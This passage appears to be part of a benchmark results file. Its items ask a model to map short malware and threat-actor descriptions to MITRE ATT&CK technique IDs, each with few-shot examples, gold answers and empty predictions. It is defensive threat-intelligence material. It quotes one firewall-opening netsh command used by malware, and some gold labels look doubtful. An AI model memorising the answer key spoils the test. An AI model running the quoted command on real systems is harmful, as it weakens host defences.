uses the command prompt to execute commands on the victim's machine.\n\t - T1059: Command and Scripting Interpreter\n- Text: Also, the postinstall script moves the .CrashReporter program to a new location /Library/JMTTrader/CrashReporter and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: DownPaper uses the command line.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "MuddyWater has used a custom tool for creating reverse shells.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT19 configured its payload to inject into the rundll32.exe.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Activation of these hooks is done by Ebury injecting its dynamic library into every descendant processes of sshd. To inject itself into subprocesses, Ebury hooks execve and use the dynamic linker LD_PRELOAD variable. Every time a new process is created, Ebury adds LD_PRELOAD=<Ebury_filename> to its environment. Once the new process is executed, Ebury\u2019s dynamic library is loaded and its constructor is called, executing the hooking routines\n\t - T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking\n- Text: Its sole purpose is to load setup.dll using LoadLibraryA. If not, it will attempt to obtain such privileges using token impersonation if the version of Windows is below Windows 7 build 7601; otherwise it will attempt different UAC bypass techniques, allowing installation of the payload loader into one of\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n", + "input": "FELIXROOT uses Rundll32 for executing the dropper program.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n\t - T1046: Network Service Discovery\n- Text: PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.\n\t - T1205.001: Traffic Signaling - Port Knocking\n- Text: Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message\n\t - T1110.001: Brute Force - Password Guessing\n", + "input": "P.A.S. Webshell can scan networks for open ports and listening services.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: identifies a proxy server if it exists and uses it to make HTTP requests.\n\t - T1090: Proxy\n- Text: On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains\n\t - T1090.002: Proxy - External Proxy\n\t - T1095: Non-Application Layer Protocol\n- Text: Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "Bisonal has supported use of a proxy server.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lizar can execute PE files in the address space of the specified process.\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004\n\t - T1106: Native API\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1053.003: Scheduled Task/Job - Cron\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: (Source: SecureWorks) The \u201cWindows Folder.exe\u201d executable spawns and injects code into the legitimate notepad.exe Windows process (see Figure 2)\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1055: Process Injection\n", + "input": "Ryuk has used multiple native APIs including \"ShellExecuteW\" to run executables,\"GetWindowsDirectoryW\" to create folders, and \"VirtualAlloc\", \"WriteProcessMemory\", and \"CreateRemoteThread\" for process injection.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/ folder\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: AppleJeus has placed a plist file within the \"LaunchDaemons\" folder and launched it manually.\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n- Text: The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "Dacls can establish persistence via a LaunchAgent.", + "gold": "- T1543.001: Create or Modify System Process - Launch Agent", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.\n\t - T1036.002: Masquerading - Right-to-Left Override\n- Text: has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.\n\t - T1204: User Execution\n- Text: uses a virus that propagates by infecting executables stored on shared drives.\n\t - T1080: Taint Shared Content\n", + "input": "BRONZE BUTLER has used Right-to-Left Override to deceive victims into executing several strains of malware.", + "gold": "- T1036.002: Masquerading - Right-to-Left Override", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point\n\t - T1609: Container Administration Command\n- Text: has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.\n\t - T1078: Valid Accounts\n\t - T1133: External Remote Services\n- Text: Peirates can deploy a pod that mounts its node\u2019s root file system, then execute a command to create a reverse shell on the node.\n\t - T1610: Deploy Container\n", + "input": "Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API.", + "gold": "- T1133: External Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore have we have dubbed it \u201cRANCOR\u201d. The Rancor group\u2019s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers\u2019 toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1105: Ingress Tool Transfer\n- Text: Turian has the ability to use Python to spawn a Unix shell.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the \u201cfeast\u201d parameter as its export function. Once ServHelper is executed, it runs a PowerShell script to get information from the infected machine\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Kimsuky has downloaded additional scripts, tools, and malware onto victim systems.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can function as a proxy to create a serve that relays communication between the client and C&C server.\n\t - T1090: Proxy\n- Text: For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014 the Linux kernel firewall \u2014 using the iptc_insert_entry() function from libiptc1 to allow output communication to it\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to \u201crescue\u201d each other if communications are lost with one of the backdoors\n\t - T1124: System Time Discovery\n\t - T1057: Process Discovery\n\t - T1049: System Network Connections Discovery\n\t - T1018: Remote System Discovery\n", + "input": "HARDRAIN uses the command \"cmd.exe /c netsh firewall add portopening TCP 443 \"adp\"\" and makes the victim machine function as a proxy server.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Linfo creates a backdoor through which remote attackers can retrieve system information.\n\t - T1082: System Information Discovery\n- Text: BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Earth Lusca collected information on user accounts via the \"whoami\" command.\n\t - T1033: System Owner/User Discovery\n", + "input": "OSX_OCEANLOTUS.D collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version. OSX_OCEANLOTUS.D has used the \"ioreg\" command to gather some of this information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PingPull can collect data from a compromised host.\n\t - T1005: Data from Local System\n- Text: POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.\n\t - T1105: Ingress Tool Transfer\n- Text: Machete's collected data is exfiltrated over the same channel used for C2.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "Mongall has the ability to upload files from victim's machines.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SLOTHFULMEDIA can inject into running processes on a compromised host.\n\t - T1055: Process Injection\n- Text: Carbanak downloads an executable and injects it directly into a new process.\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: Chinese state-sponsored cyber actors have been observed: \uf0b7 Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. \uf0b7 Using shellcode that injects implants into newly created instances of the Service Host process (svchost).\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n", + "input": "Sliver can inject code into local and remote processes.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot has used \"printf\" and file I/O loops to delay process execution as part of API hammering.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" checking the returned value of \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PTRACE_DENY_ATTACH\" flag to prevent debugging.\n\t - T1622: Debugger Evasion\n- Text: The name EvilBunny is derived from debug information embedded in the malware\u2019s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\\Perf Manager\\ or %WINDIR%\\msapps\\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed \u2018hearer\u2019, which is believed to stand for \u2018listener\u2019. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Okrum's loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can obtain information about running processes on the victim.\n\t - T1057: Process Discovery\n- Text: InvisiMole has a command to list account information on the victim\u2019s machine.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Meteor has the ability to search for Kaspersky Antivirus on a victim's machine.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Remsec can obtain a process list from the victim.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoshC2 contains an implementation of Mimikatz to gather credentials from memory.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Cobalt Strike can recover hashed passwords.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: Leafminer used several tools for retrieving login and password information, including LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Indrik Spider used Cobalt Strike to carry out credential dumping using ProcDump.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 13 Copy file to adbFle.tmp, and upload it to the C2\n\t - T1105: Ingress Tool Transfer\n- Text: TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Meteor can use PowerShell commands to disable the network adapters on a victim machines.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "JSS Loader has the ability to download malicious executables to a compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chrommme has the ability to capture screenshots.\n\t - T1113: Screen Capture\n- Text: MacSpy can record the sounds from microphones on a computer.\n\t - T1123: Audio Capture\n- Text: T9000 uses the Skype API to record audio and video calls. It writes encrypted data to \"%APPDATA%\\Intel\\Skype\".\n\t - T1123: Audio Capture\n\t - T1125: Video Capture\n", + "input": "RedLeaves can capture screenshots.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.\n\t - T1187: Forced Authentication\n- Text: These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: FlawedAmmyy may obfuscate portions of the initial C2 handshake.\n\t - T1001: Data Obfuscation\n", + "input": "EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.", + "gold": "- T1187: Forced Authentication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Comnie uses RC4 and Base64 to obfuscate strings.\n\t - T1027: Obfuscated Files or Information\n- Text: Each web shell instance is configured to contain SP, Key, and Log variables. When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell. The DES key to encrypt the credentials in the configuration observed by CTU researchers is 12345678, and the log file is c:\\log.txt. The decrypted contents of the log file adhere to the format in Figure 22\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Higaisa used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: searches the local system and gathers data.\n\t - T1005: Data from Local System\n- Text: S-Type has run the command `net user` on a victim.\n\t - T1087.001: Account Discovery - Local Account\n- Text: Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers\n\t - T1016: System Network Configuration Discovery\n", + "input": "TrickBot collects local files and information from the victim\u2019s local machine.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Valak can determine if a compromised host has security products installed.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: TinyZBot can disable Avira anti-virus.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted\n\t - T1057: Process Discovery\n", + "input": "build_downer has the ability to detect if the infected host is running an anti-virus process.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has sent spearphishing emails in an attempt to lure users to click on a malicious link.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.\n\t - T1204.002: User Execution - Malicious File\n- Text: APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "Saint Bot has relied on users to click on a malicious link delivered via a spearphishing.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc\n\t - T1033: System Owner/User Discovery\n\t - T1057: Process Discovery\n\t - T1082: System Information Discovery\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: The Nefilim ransomware uses IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess API functions to check if a user-mode debugger is running. Debuggers are used by security analysts to inspect malware\u2019s behavior at the run-time. In the presence of a debugger, malware samples exhibited less malicious behavior. Moreover, Nefilim uses the NtSetInformationThread API function to evade debugging.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: 